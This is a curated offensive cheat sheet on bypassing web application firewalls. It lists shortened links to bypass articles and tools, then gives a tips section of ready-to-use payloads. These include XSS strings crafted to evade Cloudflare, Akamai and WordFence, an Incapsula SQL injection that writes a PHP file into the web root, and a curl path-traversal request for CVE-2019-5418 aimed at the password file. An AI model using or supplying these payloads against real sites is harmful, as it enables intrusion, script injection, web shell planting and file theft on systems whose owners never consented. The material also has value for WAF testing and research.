Web Application Firewall Bypass
Article
JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF:
http://bit.ly/2TGQJws
How to bypass libinjection in many WAF/NGWAF http://bit.ly/2YzJf20
HOW TO BYPASS CLOUDFLARE WAF
http://bit.ly/2OMR4go
XXE that can Bypass WAF Protection – Wallarm http://bit.ly/2V2dHQf
CVE-2019–5418: on WAF bypass and caching http://bit.ly/2UhyZNE
Abusing unicode in NodeJS to bypass a WAF
http://bit.ly/2Yw8iTE
How To Exploit PHP Remotely To Bypass Filters & WAF Rules -
http://bit.ly/2YqHYua
WAF Evasion Techniques
Part 1 : http://bit.ly/2Uh7JxH
Part 2 : http://bit.ly/2TFD7ls
Part 3 : http://bit.ly/2YuQ4Sx
Bypassing WAFs with JSON Unicode Escape Sequences -
http://bit.ly/2Ui7zGw
Bypassing Web-Application Firewalls by abusing SSL/TLS
http://bit.ly/2ZkRfob
Evil XML with two encodings http://bit.ly/2JR5Js7
WAF Bypass Writeup = WAF Bypass at PHDays VII: Results and Answers -
http://bit.ly/2FJcbNV
collected by @0midzamani
Tools
Analysing parameters with all payloads' bypass methods, aiming at
benchmarking security solutions like WAF.
http://bit.ly/2Uj32DI
Bypass Cloudflare WAF to Pwned application – InfoSec Write-ups – Medium
- http://bit.ly/2TMsFss
CloudBunny - A Tool To Capture The Real IP Of The Server That Uses A
WAF As A Proxy Or Protection - http://bit.ly/2uzPk0O
XIP - Tool To Generate A List Of IP Addresses By Applying A Set Of
Transformations Used To Bypass Security Measures E.G. Blacklist Filtering, WAF,
Etc. http://bit.ly/2UlxX28
Detect and bypass web application firewalls and protection systems
http://bit.ly/2FHKbKm
WAFNinja is a tool which contains two functions to attack Web
Application Firewalls.
http://bit.ly/2U1s377
WAFW00F allows one to identify and fingerprint Web Application Firewall
(WAF) products protecting a website.
http://bit.ly/2HLZP9S
BypassWAF - Burp Plugin to Bypass Some WAF… http://bit.ly/2TD7Lf3
Raptor WAF - Web Applicaiton to Train Attacks to Bypass
http://bit.ly/2I0jzWO
bypass_waf -
Automatic WAF bypass tool
http://bit.ly/2Oyh8vz
wafpass - WAF Security Benchmark
http://bit.ly/2Uj32DI
Bypassing WAF by abusing SSL/TLS Ciphers
http://bit.ly/2VOvc77
Tips
WAF bypass of the day
<scronerror=ipt>prompt(document.domain)</scronerror=ipt>
� WAF bypass tip, remove content-type header in http req, also recent
Imperva CVE.
Bypass a semi-popular web forum's WAF with this beaut (every character
is requried):
<style><img src="</style><img src=x "><object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Nice example of payload splitting used by @ReeverZax to bypass a WAF.
onload=\"a='alert()';d='XSS ';b='t(d)';c=a+b;console.log(eval(c));
WordFence #WAF Bypass
Num Entity w/ Semicolon
<a href=javascript:alert(1)>
https://brutelogic.com.br/xss.php?a=%3Ca+href=javas
%26%2399;ript:alert(1)%3E
Incapsula WAF SQLinj bypass & web shell upload:
' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php
phpinfo();?>
Want to bypass WAF when exploiting CVE-2019-5418 ?
curl -H 'Accept: ../../../../../../e*c/p*s*d{{' http://server/...
WAF BYPASSING javascript:"/*'/*`/*--><html \"
onmouseover=/*<svg/*/onload=alert()//>
javascript://comment%0a%0dalert(0);
XSS payload for Akamai WAF bypass "%3balert`1`%3b".
Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter
in the wild):
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
Javascript URI cushioned between carriage returns with a non-bracketed
prompt.
List
A curated list of awesome web-application firewall (WAF) stuff.
http://bit.ly/2V3gKI2
A comprehensive list of WAF security bypass research
http://bit.ly/2HXSt2o
